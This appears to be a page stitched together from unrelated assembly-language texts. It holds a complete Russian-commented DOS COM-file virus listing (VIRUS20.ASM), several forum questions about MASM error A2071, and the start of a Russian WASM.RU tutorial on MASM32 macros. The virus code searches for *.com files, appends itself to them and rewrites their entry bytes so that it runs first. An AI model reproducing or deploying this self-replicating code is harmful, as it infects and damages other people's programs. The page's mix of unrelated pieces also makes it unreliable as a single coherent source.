1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 |
; VIRUS20.ASM - программа к Главе № 020 .286 CSEG segment assume cs:CSEG, ds:CSEG, es:CSEG, ss:CSEG org 100h Begin: push offset Init ;3 байта ret ;1 байт dw 1122h ;2 байта (метка, указывающая, что файл уже заражен) ; --------- ;ИТОГО: 6 байт F_bytes equ $-offset Begin ;Длина первых байт "файла-жертвы" ; === Процедуры работы с файлами === ; --- Открытие файла для записи --- ; Вход: DX - путь файлу ASCIZ ; Выход: Handle, BX - номер файла Open_file proc mov ax,3D02h ;Открываем файл для чтения/записи mov dx,1Eh ;DX указывает на имя найденного файла в DTA int 21h mov Handle,ax ;Сохраняем номер файла mov bx,ax ret Handle dw 0FFFFh ;Переменная для хранения номера файла Open_file endp ; --- Закрытие файла --- ; Вход: Handle - номер открытого файла ; Выход: ничего Close_file proc cmp Handle,0FFFFh ;Нет открытых файлов? je No_close ;Тогда выходим (закрывать нечего!) mov bx,Handle ;Закрываем файл... mov ah,3Eh int 21h No_close: ret Close_file endp ; --- Поиск первого файла --- Find_first proc mov ah,4Eh ;Ищем первый файл по маске (Mask_file) xor cx,cx ;Атрибуты обычные (CX=0) mov dx,offset Mask_file ;Адрес маски в DS:DX int 21h ;Теперь имя файла находится по адресу 0BF00:001Eh ret Mask_file db '*.com',0 ;Маска для поиска (только COM-файлы) Find_first endp ; --- Поиск следующих файлов --- Find_next proc xor dx,dx ;DS:DX указывают на DTA xor cx,cx ;Атрибуты обычные mov ah,4Fh int 21h ;Теперь в DTA находится информация о следующем ;найденном файле ret Find_next endp ; --- Заражение файла --- Infect_file proc mov ax,cs:[1Ch] ;Получим второе слово длины заражаемого файла or ax,ax ;Если оно не равно 0, то выходим... jnz Error_infect ;...это значит, что размер файла больше 64Кб. mov bp,cs:[1Ah] ;Получим младшее слово (т.е. размер файла) call Open_file ;Открываем файл jc Error_infect ;Ошибка - на выход mov ah,3Fh mov cx,F_bytes ;Читаем первые шесть байт "файла-жертвы"... mov dx,offset Finish ;...в хвост нашего вируса. int 21h jc Error_infect mov bx,dx cmp word ptr [bx+4],1122h ;Проверим на то, заражен ли уже этот файл je Error_infect ;Если да, то - на выход... mov ax,4202h ;Установим указатель чтения/записи на конец файла. mov bx,Handle xor cx,cx ;Отсчитывать 0 байт... xor dx,dx int 21h jc Error_infect mov ah,40h ;В BX уже есть номер файла. mov cx,offset Finish-100h-F_bytes ;Пишем в хвост "файла-жертвы" mov dx,100h ;тело вируса. int 21h jc Error_infect mov ah,40h ;После тела вируса дописываем первые mov cx,F_bytes ;настоящие шесть байт "файла-жертвы"... mov dx,offset Finish int 21h jc Error_infect call Close_file ;Закрываем файл. add bp,offset Init ;К длине файла прибавляем смещение метки Init mov ss:[101h],bp ;Заносим полученный адрес после push call Open_file ;Открываем файл. Теперь указатель в начале... mov ah,40h ;Запишем первые шесть байт (переход на вирус) mov cx,F_bytes ;поверх уже имеющихся... push ss ;Пишем с сегмента "файла-жертвы" pop ds mov dx,100h int 21h push cs pop ds call Close_file ;Закрываем файл clc ;Сигнал успешного заражения... ret Error_infect: call Close_file ;Закрываем файл stc ;Сигнал того, что произошла ошибка при заражении. ret Infect_file endp ; === Процедура инициализации вируса === Init: pusha ;Сохраним все регистры в стеке call Get_IP ;Получим смещение, где мы сейчас находимся Get_IP: pop ax ;Теперь в AX - смещение sub ax,offset Get_IP ;Вычтем из него реальный адрес, где мы будем ;находиться в сегменте 0BF00h ;Получим размер файла-"жертвы", если его нет ;(т.е. мы запускаем вирус первый раз), ;то AX будет равен 0 push 0BF00h pop es ;ES - сегмент, куда будем перемещать код вируса. mov di,offset Open_file ;DI - смещение (адрес самой первой процедуры) mov si,di add si,ax ;SI должен содержать РЕАЛЬНЫЙ адрес (смещение), т.к. мы ;пока еще в сегменте "файла-жертвы"... mov cx,offset Finish-offset Open_file ;CX = длина нашего вируса rep movsb ;Теперь в памяти две копии вируса ;Занесем в стек смещение (Lab_return+AX) и сегмент (CS) возврата из копии... mov bx,offset Lab_return add bx,ax ;Как бы искусственно заносим адрес возврата для retf push cs push bx ;Занесем в стек адрес для перехода в нашу копию: ; * сегмент - 0BF00h ; * смещение - Lab_jmp mov bx,offset Lab_jmp ;Аналогично вышесказанному... push 0BF00h push bx ;Теперь перейдем на метку Lab_jmp, расположенную в сегменте 0BF00h. retf ; Теперь мы уже в области экрана Lab_jmp: ;CS теперь равен 0BF00h. push cs ;Настроим регистр DS pop ds mov ah,1Ah ;Установим DTA для поиска файлов xor dx,dx ;Он устанавливается на тот адрес, который содержится int 21h ;В регистрах DS:DX. В отладчике смотрите, ;что находится в памяти на которую указывают данные ;регистры, т.е. DS:DX... call Find_first ;Ищем первый файл jc Nomore_files ;Нет COM-файлов в текущем каталоге - на выход Inf_file: call Infect_file ;Нашли - пробуем заразить jnc Nomore_files ;Удалось заразить - выходим call Find_next ;Не удалось заразить - ищем следующий jnc Inf_file ;Нашли еще один COM-файл; пробуем заразить... Nomore_files: mov si,offset First_bytes ;DS:SI - на массив из шести байт mov di,100h ;ES:DI - куда перемещать строку (шесть байт) push ss ;ES должен указывать на сегмент "файла-жертвы" pop es mov cx,F_bytes ;6 байт перемещаем: DS:SI = ES:DI rep movsb retf ; Теперь мы опять в сегменте зараженной программы Lab_return: push cs ;Восстановим DS (ES уже в порядке!) pop ds mov ah,1Ah ;Восстановим DTA mov dx,80h int 21h popa ;Восстановим регистры ;!!! Передаем управление "файлу-жертве" !!! push 100h ;Обратите внимание, как мы теперь переходим... ret ;...на адрес 100h. ; === Данные === ;Здесь (First_bytes) будут храниться первые байты "файла-жертвы". ;Если это первый запуск вируса, то по умолчанию получим: ;nop (90h) ;nop (90h) ;nop (90h) ;nop (90h) ;int 20h (0CDh, 20h) ;Итого: 6 байт ;Первые шесть байт зараженного файла будут такими: ;1 - push (68h) ;2,3 - адрес метки инициализации вируса ;4 - ret (0C3h) ;5,6 - заражен ли файл уже (1122h)? First_bytes db 4 dup (90h), 0CDh, 20h Finish equ $ CSEG ends end Begin |
Folks, thanks for your time and support
The assembler throws up the A2071 error pointing to the readrec endp statement — full code follows:
.486 ; create 32 bit code
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
include masm32includewindows.inc ; always first
include masm32macrosmacros.asm ; MASM support macros
; ——————————————————————
; include files that have MASM format prototypes for function calls
; ——————————————————————
include masm32includemasm32.inc
include masm32includegdi32.inc
include masm32includeuser32.inc
include masm32includekernel32.inc
include masm32includemsvcrt.inc ; C Runtime Library (CRT)
; ————————————————
; Library files that have definitions for function
; exports and tested reliable prebuilt code.
; ————————————————
includelib masm32libmasm32.lib
includelib masm32libgdi32.lib
includelib masm32libuser32.lib
includelib masm32libkernel32.lib
includelib masm32libmsvcrt.lib ; C Runtime Library (CRT)
include gwMacros.inc
.DATA ; Begin initialized data segment
; —————————
; PROTO statements for INVOKE
; —————————
show_text PROTO :DWORD
wtor PROTO :DWORD, :DWORD
strlen PROTO:PSTR
SetConRows PROTO :DWORD
system PROTO C, :PTR BYTE
readrec PROTO :DWORD
; —————————
; CONSOLE definitions
; —————————
txtmsg db «This is in the .DATA section»,0 ; General display message
txtout db ‘Enter input : ‘,0 ; Request input prompt
txtin dword 25 DUP(?) ; Console input buffer
txtlen dword ($-txtin) ; Console buffer size
CRLF DB 00Ah, 00Dh, 0 ; End of line
command BYTE «color 17»,0 ; Set console Fore — white, Back — blue
commandw BYTE «mode CON: COLS=140» ; Set console column width
; —————————
; FILE definitions
; —————————
recout BYTE 160 DUP (?) ; Output record buffer
reclen dword ($-recout) ; Output record length
recptr PBYTE recout ; Output record pointer
hWriteto dd ? ; Device handle (Writefile)
ByteCnt dd ? ; Bytes written (Writefile)
.CODE ; Tell MASM where the code starts
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; < LOCAL MACROS
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
start:
INVOKE SetConRows,70 ; Resize Console window
invoke system, offset command ; set new back/fore colours
invoke system, offset commandw
call sub4 ; branch to Subroutine
exit
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
sub4 proc
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; < SUB4 FILE I/O
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; ————————————————-
; open the file read and display its content
; (RECORD OPTION)
; ————————————————-
invoke readrec, offset recout
ret
sub4 endp
readrec proc outbuf:dword
LOCAL hFile :DWORD ; file handle
LOCAL bwrt :DWORD ; variable for bytes written
LOCAL cloc :DWORD ; current location variable
LOCAL txt :DWORD ; text handle
LOCAL flen :DWORD ; file length variable
LOCAL hMem :DWORD ; allocated memory handle
LOCAL lbuf :DWORD ; address of line buffer
LOCAL inPtr :DWORD ; input buffer ptr
LOCAL otPtr :DWORD ; output buffer ptr
cmp hMem, 0 ; Check if file open
jne labGO ; Jump if so
mov hFile, fopen(«testIN.asm») ; open the input file
mov flen, fsize(hFile) ; get its length
mov hMem, alloc(1024+1) ; allocate a 1k plus ‘0’ buffer
mov eax, outbuf ; store passed line buffer
mov lbuf, eax ; store passed line buffer
mov inPtr, 0 ; reset input buffer ptr
mov otPtr, 0 ; reset output buffer ptr
labRD:
mov cloc, fseek(hFile,cloc,0) ; save next file pointer
mov bwrt, fread(hFile,hMem,1024) ; read data from file into buffer
labGO:
mov esi,hMem ; setup input buffer
mov edi,outbuf ; setup output line buffer
starting:
;========================= BUILD A NEW LINE =========================================
rdLine: ; Get Line
mov al,[esi] ; get next input char
inc esi ; incr in pointer
cmp al,13 ; check if CR char
je labCR ; go check for EoR
mov[edi],al ; store next output char
inc edi ; incr out pointer
jmp rdLine ; loop for next
;=======================================================================================
labCR: ; CR found
mov[edi],al ; store CR char
inc edi ; incr out pointer
mov al,[esi]
inc esi
cmp al,10 ; check if LF char
je labLF
labLF: ; LF found
mov[edi],al ; store LF char
inc edi ; incr out pointer
ret
readrec endp
SetConRows PROC USES EBX ESI EDI dwRows:DWORD
;——————————————————
LOCAL _csbi :CONSOLE_SCREEN_BUFFER_INFO
LOCAL _rcWindow :RECT
LOCAL _rcWork :RECT
;——————————————————
;get current character rows
INVOKE GetStdHandle,STD_OUTPUT_HANDLE
lea edx,_csbi
INVOKE GetConsoleScreenBufferInfo,eax,edx
movzx ebx,_csbi.srWindow.Bottom
movzx eax,_csbi.srWindow.Top
sub ebx,eax
inc ebx ;EBX = number of character rows in current window
;get console window title bar + border height
;calculate cell height and proposed new client height
INVOKE GetConsoleWindow
xchg eax,edi ;EDI = hWnd
INVOKE GetClientRect,edi,addr _rcWindow
xor eax,eax
mov esi,_rcWindow.top
mov edx,eax
sub esi,_rcWindow.bottom ;ESI = -(client height)
sub eax,esi ;EAX = +(client height)
div ebx ;EAX = character cell height
mul dwRows
xchg eax,ebx ;EBX = proposed new client height
INVOKE GetWindowRect,edi,addr _rcWindow
add esi,_rcWindow.bottom
sub esi,_rcWindow.top ;ESI = title bar + border height
add esi,ebx ;ESI = proposed new window height
;justify new window in desktop work area
INVOKE SystemParametersInfo,SPI_GETWORKAREA,NULL,addr _rcWork,NULL
mov ecx,_rcWindow.top
mov edx,_rcWork.bottom
lea eax,[ecx+esi]
.if eax>edx
xchg eax,edx
sub edx,eax
sub ecx,edx
.if CARRY?
xor ecx,ecx
.endif
.endif
;set window size and position
mov esi,_rcWindow.left
mov edx,_rcWindow.right
sub eax,ecx
sub edx,esi
INVOKE MoveWindow,edi,esi,ecx,edx,eax,TRUE
ret
SetConRows ENDP
SetTextColor proc fore:DWORD,back:DWORD
LOCAL hStdOut:DWORD
invoke GetStdHandle,STD_OUTPUT_HANDLE
mov hStdOut,eax
mov eax,back
shl eax,4
or eax,fore
invoke SetConsoleTextAttribute,hStdOut,eax
ret
SetTextColor endp
END start ; Tell MASM where the program ends
So I am very, very new to assembly, and we have an assignment for school to computer the function:
z = x^2 * y — 16 (4 — y)
I have been used MASM to try and compile it to determine if it’ll work, but I keep receiving an error, Error 2071: initializer magnitude too large for specified size.
My code is :
title Assignment3_JoelCatterall.asm
.model small
.stack 100h
.data
include const.inc
x dw ?
y dw ?
z dw ?
ntrfir db 'Enter first number $'
ntrsec db cr, lf, 'Enter second number $'
pntequ db cr, lf, 'The point (', x, ', ', y, ') is $'
.code
extrn getint: proc, putint: proc
main proc
; -- initalize DS
mov ax, @data
mov ds, ax
;write "Enter first number"
mov ah, dispstr
mov dx, offset ntrfir
int dosfunc
; read x
call getint
mov x, ax
;write cr, lf, 'Enter second number'
mov ah, dispstr
mov dx, offset ntrfir
int dosfunc
; read y
call getint
mov y, ax;
; z (x,y) = x^2 * y - 16 * (4 - y)
mov ax, x
imul x
imul y
mov cx, ax
mov ax, 16
mov bx, 4
sub bx, y
imul ax
sub cx, bx
mov z, cx
; write cr, lf, 'The point(x, y) is :'
mov ah, dispstr
mov dx, offset pntequ
int dosfunc
mov ax, z
call putint
; return -- to DOS
mov ah, ret2dos
int dosfunc
main endp
end main
The error is being prompt at:
pntequ db cr, lf, 'The point (', x, ', ', y, ') is $'
I attempted to change db
to dw
or dd
but then receiving the error:
Error A2084: constant value too large
Like I said, I’m very new to this, so whatever help or information you provide would be of great help!
Thanks!
- Remove From My Forums
-
Question
-
I’m trying to build an assembly file which is included in a 64-bit Static C library which dynamically links with the 64-bit C Runtime Libraries. The library is 64-bit which is part of where I believe the issue is.
Here’s the top part of the assembly:
JMEMDOSA_TXT segment byte public 'CODE' assume cs:JMEMDOSA_TXT public _jdos_open public _jdos_close public _jdos_seek ...
Here’s the error I get:
A2071: initializer magnitude too large for specified size.
The error is on the first line where the segment is referenced where I believe it is trying to load the 64-bit C runtime library.
Is anyone familiar with assembly and MASM who could point me in the right direction on how to fix this to compile?
Here is a link to the full source file:
https://github.com/cloudflare/jpegtran/blob/master/jmemdosa.asm
-
Edited by
Thursday, June 14, 2018 2:26 PM
added full source file link
-
Edited by
Руководство по проектированию макросов в MASM32
Руководство по проектированию макросов в MASM32 — Архив WASM.RU
Руководство по проектированию макросов в MASM32
Edmond / HI-TECH
Руководство по проектированию макросов в MASM32
Пойми в Хаосе Разное, и стань человеком.
Осознай Единое в Различном – и будь Богом.Автор
I. От автора
I.1. Для тех, кто впервые
I.2. Примечания (обо всём понемногу)
I.3. Особенности терминологии
I.4. БлагодарностиII. Лень – двигатель Макро
III. Макромир MASMIII.1. Функционирование макросов
III.2. Определение макро переменных и строк
III.3.
Обработка выражения в MASM
III.4. Целочисленные выражения MASM
III.5. Вычисление рекурсивных выражений
III.6. Встроенные макрофункции и директивы
III.7. Символ макроподстановки
III.8. Макроблоки
III.9. Отладка макроопределений и заключение
III.10. Абстрактный алгоритм анализа строки MASM (Дополнение)I. От автора
В этом руководстве раскрывается тема создания, использования (а главное –
проектирования) макросов и макрофункций в проектах на MASM32.Что не так важно в ЯВУ, то очень важно в программировании на ассемблере.
Если выстроить по приоритетам недостатки программирования на ассемблере,
то первым
недостатком будет не объём строк написанного кода (как нестранно), а отсутствие
средств, обеспечивающих хороший стиль написания кода.Что значит стиль? А что значит плохой или хороший? Это можно быстро понять
на простом примере.Допустим, у вас есть процедура объёмом на несколько экранов. Вы её написали
месяц назад, а теперь вам нужно несколько изменить её поведение. Для того,
чтобы сделать
это, вам необходимо:
- Вспомнить её алгоритм (если забыли)
- Вспомнить особенности реализации (у вас должны быть комментарии)
- Вспомнить какой участок кода, чем занимается.
Если код процедуры был прооптимизирован, вероятней всего вам захочется,
чтобы после модификации он остался настолько же оптимальным,
а поэтому вы должны
вспомнить все тонкости кода, или только того участка, который
подлежит модификации.А это не так то просто, даже если исходник написан вами, в вашем
неповторимом стиле.Если этот стиль будет хорошим, вы потратите меньшее время,
если бы стиль был бы плохим.Хороший стиль программирования – это сэкономленное время, которое
можно потратить на понимание, модификацию или, как это называют, сопровождение
кода.
Стиль программирования – это архитектура исходного кода – не только его
внешнее оформление, но и использование констант, разбиения кода на функции
или процедуры, способы вызова функций и процедур, согласованность структур,
их потенциал к расширению, гибкость алгоритмов и многое другое. Стиль программирования
сложно отделить от архитектуры самой программы, так как хорошо спроектированная
программа не может иметь плохого стиля программирования.Конечно же, на ЯВУ легче писать качественно оформленные программы, хотя бы,
потому что ЯВУ уже имеет готовые средства выражения, и шаблоны мышления.Что такое шаблоны мышления? Всё чем вы так активно пользуетесь:
— типы
— функции
— классы
— массивы
— указатели на типы
— пространства имён
— шаблоны (С++)
Всё это направляет ваше понимание программирования как пространства сотканного
из таких абстракций.Недавно я прочёл следующую мысль на форуме WASM.RU:
Да, зачем вы пишите программы на asm под Win32, лучше уже писать
под DOS, там хоть нет этого бесконечно однообразного кода создания окон
и обработки сообщений.Такое заявление говорит, что программист не желает писать проекты более чем
на 6 000 строк (или 3 000). Вместо того чтобы извлечь великую выгоду из
единообразия кода,
мы ругаем его. А ведь это первый звонок к автоматизации программирования.Неужели программирование asm может быть похоже на Delphi (ох
как его не любят некоторые)? Снова интегрированная среда? Конечно!!! (Жаль,
её всё-таки нет!) Но это не значит, что она играет отрицательную роль.
Хотя о средствах автоматизации и их создании мы поговорим в другой работе.Ассемблер не определяет шаблонов мышления, и практически не имеет средств
выражения каких либо шаблонов (из-за чего автор пользуется им).Очень сложно назвать директиву proc средством выражение процедурной
модели программирования.Однако я могу ручаться, если вы научитесь писать качественно стилизированные
программы на ассемблере, то на ЯВУ….
Об искусстве стилизации или проектировании архитектуры написано слишком мало,
а рассказать хотелось бы слишком много. Только нельзя объять необъятное, и
потому цель этого руководства рассказать об использовании макросов в MASM32,
а также
о том, как их можно либо нужно использовать, чтобы более качественно стилизировать
код.I.1 Для тех, кто впервые…
Если вы ещё не работали с макросами, или работали, но очень мало, я спешу
признаться, что это руководство не предназначалось для начинающих. Но благодаря
рекомендациям и советам TheSvin/HI-TECH я решился добавить в него вырезки
и упражнения, которые позволят вам быстро войти во вкус макромира MASM32.
Если же вы уже
имеете дело
с макросами, тогда это руководство укрепит ваши знания и представления по
данной теме.Для исследования макромира MASM мы воспользуемся директивой echo, которая
позволит вывести нам на экран то, что творится в препроцессоре MASM. Очень
удобно, а главное
наглядно. Я уверен, что вы быстро усвоите этот материал.I.2. Примечания (обо всём понемногу)
В данной работе я часто пишу: «Препроцессор ML». Кто-то из умников (или просто
жаждущих подловить «на горячем») воскликнет: «Да какой же такой ML.EXE – препроцессор?
Наглая ложь». На всякий случай оговорю, что здесь имеется ввиду не утверждение
«ML – препроцессор», а именование его подсистемы – препроцессор.Всё, что есть в этом руководстве не взято с потолка, и не является вымышленным.
Весь код проверен, и работает именно так как описано, если только автор случайно
не ошибся, что так же случается.Многое из того, что написано в этом руководстве недокументированно (или плохо
документировано) в официальном. Поэтому вы всегда должны помнить, что если
в следующих версиях ML (например, 8.0) что-то не будет работать, никто не
виноват.Если вы думаете, что я дизассемблировал ML.EXE – то ошибаетесь. Алгоритмы
работы, приведённые здесь, получены логическим путём на основе знаний работы
компиляторов,
а поэтому их не следует воспринимать как истинные. Важна сама логика работы,
понимание которой, поможет вам безболезненно использовать макро, допуская
меньшее количество ошибок.На самом деле MASM очень плохо документирован, и видно MS совсем не относится
к нему как к продукту (что вполне очевидно). Хотя уже в MSDN
2002 был
внесён раздел MASM Reference, и всё равно – вы не найдёте лучше описания
чем в
MASM32 by Hutch.Когда вы прочтете, то воскликните: «Да, зачем мне такой ML?». Есть NASM и FASM – главная надежда мира ассемблерщиков. Однако и теперь ML всё
ещё выигрывает
у них по удобству эксплуатации, большей частью видимо благодаря Хатчу,
и многим
замечательным людям, поддерживающим MASM32. Кто знает, может после
этой статьи кто-то воскликнет: «Я знаю, какой должен быть компилятор
мечты асмовцев!». И напишет новый компилятор. (Автор шутит ?)Уверен, что программисты из MS вряд ли прочтут эту статью (они плохо
знакомы с русским), и оно к лучшему. Возможно, такая статья могла
бы их огорчить,
а я не люблю портить настроение людям, трудами которых пользуюсь.
(Снова шутит,
только
про что?)И наконец-то мне в свою очередь хочется порадоваться, что многие
вопросы по макросам в MASM закрыты на долгое время, во всяком случае,
для русскоязычной
аудитории.
(Шутит, или нет? Гм…)I.3. Особенности терминологии
Терминология этой статьи различается от терминологии принятой в MASM.
В частности автором было предложено называть:
MacroConstant EQU 123 ;; Числовая макроконстанта
MacroVar = 123 ;; Числовая макропеременная
MacroText EQU <string> ;; строковая макропеременная
MacroText TEXTEQU <string> ;; строковая макропеременнаяВ MASM:
MacroConstant EQU 123 ;; numeric equates
MacroVar = 123 ;; numeric equates
MacroText EQU <string> ;; text macro
MacroText TEXTEQU <string> ;; text macroМожно было бы попросту выбрать терминологию MASM, однако последняя не позволяет
объяснять материал систематически. То есть все четыре вида выражений – по сути,
являются переменными или константами. Однако в терминологии MASM два последних
определения называются текстовыми макро, подчёркивая их связь с макросами.Если пойти этим путём, то тогда и первые два определения – являются упрощёнными
определениями макро. Если разработчики желали подчеркнуть, что сама суть
внутренней реализации
ML представляет текстовые макросы как макро, то тогда не ясны те все эффекты
функциональности, обсуждаемые в этой статье.Что имеет ввиду автор?
Посмотрите что такое макроопределение – это некий текст, который как бы
«вставляется» препроцессором в исходный текст программы в месте вызова
макро.
А что такое в терминологии MASM numeric equates, или text macro – это некоторые
переменные, значения которых «подставляются» в исходный текст программы
во время компиляции вместо имён этих переменных.
Таким образом, можно сказать, что определения представленные выше – макро,
но в упрощённом их виде.Этот спор не решаем, что не так и важно. Поэтому автор отдаёт предпочтение
двум терминам для «text macro»: «текстовой макро» и «строковая макропеременная».Понятие: «numeric equates» является общим для первых двух случаев, и разрывает
смысловую связь с двумя последними определениями. Поэтому я пользуюсь своим
вариантом терминологии, который подчёркивает, что определения:MacroConstant EQU 123 ;; Числовая макроконстанта
MacroVar = 123 ;; Числовая макропеременнаяявляются подобными макро. А, кроме того, первое из низ – константа, а второе
– переменная.I.4. Благодарности
Не могу не написать этот пункт, ибо не только автору обязана эта статья.
Она обязана замечательной версии Win98 с инсталляцией от 2000, которая отформатировала
весь мой винчестер, и унесла в небытие первый вариант настоящей статьи.Не малая заслуга в вопросе терминологии MASM, и его разрешении принадлежит
Four-F, который как он сам мне признался, съел на макросах
собаку, при чём без соли.
Когда я думаю, чтобы было бы без самого Маниакального редактора в Inet,
CyberManiacа, то понимаю: без его правок мои статьи приводили
бы в ужас, и лишали разума
всех морально неустойчивых читателей. CyberManiac: «Только такой замечательный
безумец
как ты может выдержать ЭТО!!!».
FatMoon, Rustam, The Svin – вы дали понять мне то, что такая статья действительно
нужна, и это, наверное, самое главное. Вряд ли я бы так долго работал
над ней, если бы меня никто не подталкивал.Всех кого я забыл поблагодарить здесь, и кого не забыл, жду в условном
месте в условное время для раздачи благодарностей.С уважением, Edmond/HI-TECH
II. Лень – двигатель Макро
Когда говорят, что лень – это двигатель прогресса, видимо лицемерят или преувеличивают.
Скорее это нежелание выполнять одну и ту же работу очень часто. Первая парадигма
к созданию макро звучит так:Если есть что-то похожее, что нужно делать очень часто, я могу оформить
это как макроопределение.Ассемблер, дающий программисту полную свободу в использовании методик программирования,
совершенно лишает его средств для выражения этих методик. Например, ООП. В
MASM32 нет классов, конструкторов и других механизмов, поддерживающих эту абстракцию.
Зато вместо ООП Вы можете придумать множество других методик и абстракций (как,
например модель серверов).Та или иная методика программирования обязательно состоит из каких-либо компонентов,
которые являются подобными друг другу. Например, следующие макро очень любимы
в примерах пакета MASM32:m2m MACRO M1, M2 push M2 pop M1 ENDM return MACRO arg mov eax, arg ret ENDMПредположим, что кому-то так надоело писать:
push переменная2
pop переменная1И он решил придумать макро для этого. Эта пара команд осуществляет пересылку
данных из одной ячейки памяти в другую. То есть теперь в программе, когда вы
захотите написать push/pop, вы можете заменить это некой m2m операнд1,
операнд2.
Посмотрите на эти два участка кода:mov wc.cbWndExtra, NULL
m2m wc.hInstance, hInst
mov wc.hbrBackground, COLOR_BTNFACE+1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
mov wc.cbWndExtra, NULL
push hInst
pop wc.hInstance,
mov wc.hbrBackground, COLOR_BTNFACE+1Первый вариант не только занимает меньше строк (что тоже важно), но и намного
понятнее, чем push/pop (если вы, знаете что такое m2m). Конечно, если говорить
о макро m2m, то он имеет и очень важный недостаток.Мощь макро была бы сказочной, если бы MASM умел следить за
кодом, или ему можно было бы указать, что, например, сейчас регистр ebx
== 0, или eax никем не используется. Хотя мы попробуем достичь подобного
эффекта самостоятельно.Этот недостаток потеря контроля над оптимальностью кода. Например, более быстрыми,
по сравнению с парой команд push/pop, являются mov eax,… Употребляя макро m2m,
вы получаете худший код, если стремитесь оптимизировать по скорости. И здесь
есть две стороны проектирования кода:
- Эффективность кода
- Совершенство стилистики
Используя макро m2m, вы повышаете уровень стилистики, так как сокращаете
время на понимание исходного кода (вами же или другим программистом). Однако
с другой
стороны вы теряете эффективность.Это одна из вечных задач архитектора – найти баланс между эффективностью
в коде и совершенством стилистики.Другая парадигма использования макро звучит так:
Если, объединяя что-то в одно целое, я улучшаю стиль кода – это можно
сделать в виде макроопределения.Эта парадигма отличается от предыдущей тем, что создание макроопределения
обуславливается только улучшением стилизации кода, и не имеет особой практической
ценности. Например, я объявил такие макро для определения кода начала и конца
в главном модуле программы:$$$WIN32START macro
PUBLIC l$_ExitProgram
_start:
xor ebx,ebx
endm$$$WIN32END
macro
l$_ExitProgram:
push $$$__null
call ExitProcess
end _startendmВ этих макро нет по сути никакой пользы, кроме эстетической. Зато, глядя на
код, можно сразу понять, что это не что иное, как начало программы нечто вроде
main() в C++.И последняя парадигма использования макро:
Если ты используешь технологию программирования – попытайся заключить
её в комплекс макроопределений.Например, для модульного программирования нужно создать макросы для
определения модуля, его частей, кода и данных.Наиболее важная часть использования макро. Посмотрите, например, файл Objects.INC из пакета MASM32 в папке oop (NaN & Thomas).
Мы начнём создание первых макро со следующей задачи.Наверное, вы знаете, что EXE приложения всегда могут загружаться по адресу
равному:PROGRAM_IMAGE_BASE EQU 400000hВо-первых, это даёт нам право убрать из приложения всю Relock секцию, тем
самым, уменьшив объём образа (если эта секция нужна для систем плагинов, её
можно держать отдельно).Во-вторых мы можем более не вызывать функцию GetModuleHandle, что так же
полезно для нас. Использование константы PROGRAM_IMAGE_BASE очень удобно.
Однако, что
будет значить это удобство, если всё-таки PROGRAM_IMAGE_BASE не определено?
Это будет означать, что мы обязаны переписать весь код. А если этого кода
много?Определённо об этом нужно позаботится заранее. Давайте же будем решать эту
проблему при помощи макро! Для этого нам станут необходимыми некоторые знания
о том, как
обрабатывается макро, и что это такое.III. Макромир MASM
Макрос представляет собой именованный участок исходного текста программы,
который обрабатывается компилятором каждый раз в том месте, где вызывается
макрос.
Пример:
Создайте небольшой модуль с именем macro.asm.
И напишите в нём несколько строчек.386 .data .code echo Hello!!! echo Ты должен увидеть во время компиляции endТак действует директива echo. С помощью неё можно подсмотреть значения
переменных.Mycount = 1 %echo @CatStr(%Mycount)Если вы не знаете, как это работает, не волнуйтесь, обо всём будет рассказано.
А пока несколько экспериментов:Напишите:
MyMacro macro reg dec reg endm .code mov eax,5 MyMacro eax MyMacro ebxВзгляните на код программы под отладчиком. Что у вас получилось? Что
будет, если вы измените текст внутри макроопределения?Теперь напишите:
MyVar = 1 MyMacro macro MyVar = MyVar+1 %echo MyVar = @CatStr(%MyVar) endm MyMacro MyMacro MyMacro MyMacroКаким будет вывод на экран во время компиляции?
С этого момента вам придётся различать в ассемблере ML две подсистемы: препроцессор
и компилятор. Если компилятор переводит код мнемоник в машинный код, вычисляет
значения меток и смещений, то препроцессор занимается вычислением выражений
этапа компиляции, и что самое важное – процессом раскрытия макросов.Подобно многим объектам мира программирования макро имеет два состояния в
исходном тексте: определение, и использование.Таким образом, мы будем иметь дело с определением макроса (макроопределением),
и его вызовом (использованием макроса).
Макроопределением называется любой текст, заключённый между ключевыми словами:MacroName macro paramlist
макроопределение
endmПри каждом вызове макро, а именно:
…
MacroName
или
mov eax, MacroName()
…Будет анализироваться и исполнятся текст, заключённый в макро. Именно так
это и реализовано в ML. Поскольку текст в макроопределении не компилируется,
то естественно, вы не увидите сообщений об ошибке, даже если с точки зрения
ассемблера эта ошибка будет в теле макроопределения. Однако ошибка появится
при попытке вызова макроопределения, её могут выдать вам, либо сам препроцессор,
либо компилятор, если текст, сгенерированный препроцессором является неверным
с точки зрения компилятора.Каждый раз, когда препроцессор встречает макроопределение, он помещает его
имя в специальную таблицу, и копирует его тело к себе в память (это не обязательно
